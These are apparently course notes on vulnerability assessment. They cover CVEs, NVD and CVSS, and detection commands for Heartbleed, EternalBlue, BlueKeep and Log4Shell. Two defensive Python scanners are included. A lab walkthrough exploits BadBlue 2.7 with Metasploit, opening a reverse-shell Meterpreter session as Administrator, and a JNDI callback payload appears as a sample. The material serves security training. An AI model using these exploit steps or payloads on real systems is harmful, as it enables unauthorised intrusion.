INE Training Notes - by syselement
Vulnerability Assessment

Last updated 2 years ago

⚡ Prerequisites

  • Basic networking concepts and cybersecurity

📕 Learning Objectives

  • Describe and recognize vulnerabilities, exposures reports and national vulnerability database submissions

  • Describe vulnerability management and perform research

  • Perform network auditing

🔬 Training list - PentesterAcademy/INE Labs (subscription required)

Vulnerabilities

🗒️ A vulnerability is a weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source. When exploited, it results in a negative impact on confidentiality, integrity or availability.

  • Physical layer - e.g. people, physical controls, vaults, door locks, gates, fences, cameras, badge readers, etc. There can be vulnerabilities in those as well, exploited through social engineering techniques or hardware exploitation to gain physical access.

  • Vulnerabilities on a computer come from the operating system, the system itself and its installed services; they are found by DevSec engineers, security researchers, pentesters, software developers and users.

  • NVD (National Vulnerability Database) - a United States government repository of standards-based vulnerability management data represented using SCAP (Security Content Automation Protocol), maintained by NIST.

  • All vulnerabilities in the NVD have been assigned a CVE identifier.

🗒️ The CVE (Common Vulnerabilities and Exposures) program is a public glossary of vulnerabilities identified for specific code bases, software applications or open libraries, maintained by the MITRE corporation. A unique CVE ID is primarily assigned by MITRE or by CNAs (CVE Numbering Authorities), allowing stakeholders, vendors and researchers to refer to the same new or unique vulnerability or exploit by one common identifier.

  • E.g. CVE-2014-0160 - Heartbleed, CVE-2017-0143 - EternalBlue, CVE-2021-44228 - Apache Log4j - high impact, critical vulnerabilities.

CVE page components (as shown on NVD for each entry):

  • Description

  • Severity

  • References (Advisories, Solutions, Tools)

  • Weakness Enumeration

  • Known Affected Software Configurations

🗒️ The CVSS (Common Vulnerability Scoring System) is the method used to supply a qualitative measure of severity, consisting of three metric groups: Base, Temporal and Environmental.

🗒️ Zero-day exploits are exploits for vulnerabilities not yet found, used or reported by anyone, or discovered by attackers before the vendor's security team has become aware of them. E.g.:

  • CVE-2021-30116 - Kaseya VSA exploited by REvil Ransomware

  • CVE-2020-1472 - Zerologon

Scope, impact and usefulness will come down to business needs, along with the risk management and cybersecurity recommendations.

Risk Management includes vulnerability management. By doing a VA (Vulnerability Assessment), the pentester defines, identifies, classifies and prioritizes security deficiencies in computer systems, applications and network infrastructures. Some procedures to find vulnerabilities are:

  • Scanning

  • Asset Identification and Research

  • Fuzz Testing (input/handling validation)

🗒️ Nessus is a network vulnerability scanning tool. It can be hosted locally and used for Vulnerability Assessment.

Case Studies

Heartbleed

CVE-2014-0160 - Heartbleed (see also: Heartbleed Vulnerability Explanation - by Rapid7)

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

nmap -sV --script ssl-enum-ciphers -p <SECURED_PORT> <TARGET>
nmap -sV --script ssl-heartbleed -p 443 <TARGET>
# Other ports can be used too

  • Show accepted ciphersuites and compressors with the nmap ssl-enum-ciphers script.

  • Detect servers vulnerable to the OpenSSL Heartbleed bug with the nmap ssl-heartbleed script, or with the Metasploit enumeration module.

  • exploit-db.com is useful too: search it for heartbleed.

  • ❗ always check the exploit behavior before using it

EternalBlue

CVE-2017-0143 - EternalBlue / MS17-010

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.

The EternalBlue exploit developed by the NSA was leaked to the public in 2017 by the Shadow Brokers hacker group. It was widely used in the WannaCry ransomware attack.

nmap --script smb-vuln-ms17-010 -p 445 <TARGET>

  • Specific nmap smb-vuln-ms17-010 script

  • exploit-db.com - search for EternalBlue

  • 🔬 Check the Lab 2 - Eternal Blue lab

BlueKeep

CVE-2019-0708 - BlueKeep

A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka Remote Desktop Services Remote Code Execution Vulnerability.

The vulnerability was made public by Microsoft in May 2019 and affected Windows XP, Windows Vista, Windows 7, Windows Server 2008 & R2.

It allows access to a chunk of kernel memory, allowing the attacker to remotely execute arbitrary code at the system level without authentication.

  • BlueKeep PoCs (Proof of Concepts) and exploits could be malicious in nature.

  • exploit-db.com - search for BlueKeep

  • 🔬 Check the Lab 2 - BlueKeep lab

Log4J

CVE-2021-44228 - Apache Log4j

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

nmap --script log4shell.nse --script-args log4shell.callback-server=<CALLBACK_SERVER_IP>:1389 -p 8080 <TARGET_HOST>

  • nmap-log4shell - a NSE script for Apache Log4j RCE vulnerability discovery

  • exploit-db.com - search for Log4j
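From the defender's side, the Log4Shell description above says the trigger is attacker-controlled text reaching a log message while lookup substitution is enabled. The added Python example below (not from the course notes and not part of the nmap-log4shell script) scans constructed web-server log lines for `${...}` lookup syntax in client-supplied fields, flagging lookups that name `jndi` and nested lookups, which a plain substring match would miss. The log lines, addresses and host names are constructed, and `extract_lookups`, `classify_lookup` and `scan_log` are names chosen for this example.

```python
# Constructed web-server access-log lines (not real traffic); addresses and host
# names come from the documentation/example ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://callback.example.test:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${sys:${env:HOME}} HTTP/1.1" '
    '404 0 "-" "curl/7.68.0"',
    '198.51.100.2 - - [10/Dec/2021:12:00:04 +0000] "GET /env?show=${env:HOME} HTTP/1.1" '
    '200 77 "-" "curl/7.68.0"',
]

def extract_lookups(text):
    """Return every ${...} expression in text with its nesting depth (0 = outermost).
    Braces are matched so nested lookups are captured whole; inner ones come first."""
    lookups, stack, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()
            lookups.append((text[start:i + 1], len(stack)))
        i += 1
    return lookups

def classify_lookup(expr):
    """Severity and reason for one outermost lookup expression."""
    body = expr[2:-1]
    if "jndi" in body.lower():
        return "high", "jndi lookup in client-supplied data"
    if "${" in body:
        return "medium", "nested lookup (resolved at substitution time, keyword not literal)"
    return "low", "lookup syntax in client-supplied data"

def scan_log(lines):
    """Run the classifier over log lines; one finding per outermost lookup."""
    findings = []
    for number, line in enumerate(lines, 1):
        for expr, depth in extract_lookups(line):
            if depth:  # inner lookups are covered by their outermost expression
                continue
            severity, reason = classify_lookup(expr)
            findings.append({"line": number, "severity": severity,
                             "reason": reason, "lookup": expr})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} [{f['severity']}] {f['reason']}: {f['lookup']}")
```

Any lookup syntax arriving from a client is worth a look, which is why even the plain `${env:HOME}` line is reported at low severity. A hit from this kind of scan says only that someone tried; whether the application was exposed still depends on the log4j-core version and the lookup setting described in the advisory text above.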

Vulnerable Lab

🔬 Windows: Easy File Sharing Server

  • Target IP: 10.2.28.13

  • Fingerprint the application and exploit the found vulnerability

ping 10.2.28.13
nmap -sV 10.2.28.13
80/tcp    open  http               BadBlue httpd 2.7
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49165/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

  • Research the vulnerability of BadBlue httpd 2.7 using various tools:

    • Google it: NVD - CVE-2007-6377, cvedetails.com - CVE-2007-6377, exploit-db.com

Stack-based buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier allows remote attackers to execute arbitrary code via a long query string.

  • Search for exploits from exploit-db.com or using a command line tool such as searchsploit

searchsploit - a command line search tool for Exploit-DB. A copy of the Exploit Database can be used offline.

searchsploit badblue 2.7

  • Use Metasploit to exploit the target using the PassThru Buffer Overflow module

    • This module exploits a stack buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier.

❗ Before running an exploit, ALWAYS check its source code to understand what it is doing ❗
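The fingerprint-then-research step above, as an added Python example (not part of the course notes or of nmap): it parses `nmap -sV` output lines like the lab scan, then matches each service's product and version against an affected-version table built only from the two advisories quoted on this page (BadBlue 2.72b and earlier for CVE-2007-6377, OpenSSL 1.0.1 before 1.0.1g for CVE-2014-0160). The 443/tcp line in the sample scan is constructed so the OpenSSL range has something to match; `parse_nmap_services`, `version_key`, `in_range`, `find_known_issues` and the `KNOWN_ISSUES` layout are names chosen for this example.

```python
import re

# Constructed nmap -sV style output. The BadBlue, msrpc, microsoft-ds and 3389 lines
# mirror the lab scan in the notes; the 443/tcp line is an added, constructed example
# so that the OpenSSL (Heartbleed) version range has something to match.
SAMPLE_SCAN = """\
PORT      STATE SERVICE            VERSION
80/tcp    open  http               BadBlue httpd 2.7
135/tcp   open  msrpc              Microsoft Windows RPC
443/tcp   open  ssl/http           Apache httpd 2.2.22 ((Ubuntu) OpenSSL/1.0.1e)
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
"""

# Affected-version table built only from the two advisories quoted in the notes:
#   CVE-2007-6377: BadBlue 2.72b and earlier   -> no lower bound, inclusive max 2.72b
#   CVE-2014-0160: OpenSSL 1.0.1 before 1.0.1g -> inclusive min 1.0.1, inclusive max 1.0.1f
# Entry layout (hypothetical, chosen here): (CVE id, regex whose group(1) is the
# version, inclusive minimum or None, inclusive maximum).
KNOWN_ISSUES = [
    ("CVE-2007-6377", r"BadBlue httpd (\d[\w.]*)", None, "2.72b"),
    ("CVE-2014-0160", r"OpenSSL/(\d[\w.]*)", "1.0.1", "1.0.1f"),
]

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

def parse_nmap_services(text):
    """Turn nmap's normal-output port lines into dicts; header and other lines are skipped."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, info = m.groups()
        services.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "info": (info or "").strip()})
    return services

def version_key(version):
    """Sortable key: numeric runs compare as integers, letter runs as strings,
    so 2.7 < 2.72 < 2.72b and 1.0.1 < 1.0.1f < 1.0.1g < 1.0.2."""
    parts = re.findall(r"\d+|[A-Za-z]+", version)
    return tuple((0, int(p)) if p.isdigit() else (1, p.lower()) for p in parts)

def in_range(version, minimum, maximum):
    """True when minimum (if any) <= version <= maximum, both bounds inclusive."""
    key = version_key(version)
    if minimum is not None and key < version_key(minimum):
        return False
    return key <= version_key(maximum)

def find_known_issues(scan_text):
    """Match each fingerprinted service against KNOWN_ISSUES and report the hits."""
    findings = []
    for svc in parse_nmap_services(scan_text):
        for cve, pattern, lo, hi in KNOWN_ISSUES:
            m = re.search(pattern, svc["info"])
            if m and in_range(m.group(1), lo, hi):
                findings.append({"port": svc["port"], "service": svc["service"],
                                 "info": svc["info"], "version": m.group(1), "cve": cve})
    return findings

if __name__ == "__main__":
    for f in find_known_issues(SAMPLE_SCAN):
        print(f"{f['port']}/{f['service']}: {f['info']} -> {f['cve']} (version {f['version']})")
```

A version banner is a hint, not proof: backported patches keep the old version string, and `-sV` can guess wrong, so a hit here is the starting point for the manual research step, not a confirmed finding.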

msfconsole
search badblue 2.7
use exploit/windows/http/badblue_passthru
set RHOSTS 10.2.28.13
exploit
[*] Started reverse TCP handler on 10.10.24.3:4444 
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (180291 bytes) to 10.2.28.13
[*] Meterpreter session 1 opened (10.10.24.3:4444 -> 10.2.28.13:49330) at 2023-02-25 15:32:52 +0530

  • Use meterpreter commands to find the flag

meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator
shell
cd /
dir
type flag.txt
Reveal Flag: 🚩

70a569da306697d64fc6c19afea37d94

